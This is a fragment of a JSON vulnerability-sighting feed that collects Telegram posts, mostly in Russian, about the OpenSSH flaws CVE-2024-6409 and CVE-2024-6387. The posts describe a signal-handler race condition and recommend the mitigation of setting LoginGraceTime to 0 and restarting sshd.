\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u23f1 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 (Race Condition) \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f SIGALRM. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043d\u0435 \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u0437 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\ud83d\udee0 \u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime \u0432 0 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd. \u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n#OpenSSH #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #RHEL9 #InfoSec\n\n@ZerodayAlert", "creation_timestamp": "2026-07-12T00:00:20.034559Z"}, {"uuid": "c7e7a072-9967-4890-93d8-59e5593dd2b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/securixy_kz/906", "content": "Onother one #CVE-2024-6409: Affects the privilege separation child process with limited privileges, which affects OpenSSH in versions 8.7 and 8.8.\n\n\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 grace_alarm_handler() \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep. \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435\u0435 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435, \u043d\u043e \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0438\u0441\u043a \u0434\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\u200d\n\nPatch Now: \u200d\n\u0412 /etc/ssh/sshd_config\u200d, \u0437\u0430\u0434\u0430\u0439\u0442\u0435:\n\nLoginGraceTime 0\n\n\n\u0420\u0435\u0431\u0443\u0442\u043d\u0438\u0442\u0435 sshd \nsystemctl restart sshd\n\n\u042d\u0442\u043e\u0442 \u043a\u043e\u0441\u0442\u044b\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u0435\u043d  \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043e\u0431\u0435\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVE-2024-6387 \u0438 CVE-2024-6409...", "creation_timestamp": "2026-07-12T22:00:11.108281Z"}, {"uuid": "2a7f77d7-1a07-44ba-a7ff-32876fc5f87d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/securixy_kz/906", "content": "Onother one #CVE-2024-6409: Affects the privilege separation child process with limited privileges, which affects OpenSSH in versions 8.7 and 8.8.\n\n\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 grace_alarm_handler() \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep. \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435\u0435 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435, \u043d\u043e \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0438\u0441\u043a \u0434\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\u200d\n\nPatch Now: \u200d\n\u0412 /etc/ssh/sshd_config\u200d, \u0437\u0430\u0434\u0430\u0439\u0442\u0435:\n\nLoginGraceTime 0\n\n\n\u0420\u0435\u0431\u0443\u0442\u043d\u0438\u0442\u0435 sshd \nsystemctl restart sshd\n\n\u042d\u0442\u043e\u0442 \u043a\u043e\u0441\u0442\u044b\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u0435\u043d  \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043e\u0431\u0435\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVE-2024-6387 \u0438 CVE-2024-6409...", "creation_timestamp": "2026-07-13T00:00:35.342120Z"}, {"uuid": "4801d924-ada6-47bf-b020-adf8469fb648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/securixy_kz/906", "content": "Onother one #CVE-2024-6409: Affects the privilege separation child process with limited privileges, which affects OpenSSH in versions 8.7 and 8.8.\n\n\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 grace_alarm_handler() \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep. \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435\u0435 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435, \u043d\u043e \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0438\u0441\u043a \u0434\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\u200d\n\nPatch Now: \u200d\n\u0412 /etc/ssh/sshd_config\u200d, \u0437\u0430\u0434\u0430\u0439\u0442\u0435:\n\nLoginGraceTime 0\n\n\n\u0420\u0435\u0431\u0443\u0442\u043d\u0438\u0442\u0435 sshd \nsystemctl restart sshd\n\n\u042d\u0442\u043e\u0442 \u043a\u043e\u0441\u0442\u044b\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u0435\u043d  \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043e\u0431\u0435\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVE-2024-6387 \u0438 CVE-2024-6409...", "creation_timestamp": "2026-07-14T00:00:57.954243Z"}, {"uuid": "d0f7cca6-76b0-4026-aae1-974c74943038", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/libs_of_hackers/636", "content": "\u041d\u0430\u0439\u0434\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\nhttps://xakep.ru/2024/07/16/cve-2024-6409/\n@libs_of_hackers\nhttps://xakep.ru/2024/07/16/cve-2024-6409/", "creation_timestamp": "2026-07-16T07:00:05.414405Z"}, {"uuid": "127ee9c8-5030-4754-a2c1-d28c7520e95e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/libs_of_hackers/636", "content": "\u041d\u0430\u0439\u0434\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\nhttps://xakep.ru/2024/07/16/cve-2024-6409/\n@libs_of_hackers\nhttps://xakep.ru/2024/07/16/cve-2024-6409/", "creation_timestamp": "2026-07-17T00:00:55.694496Z"}]}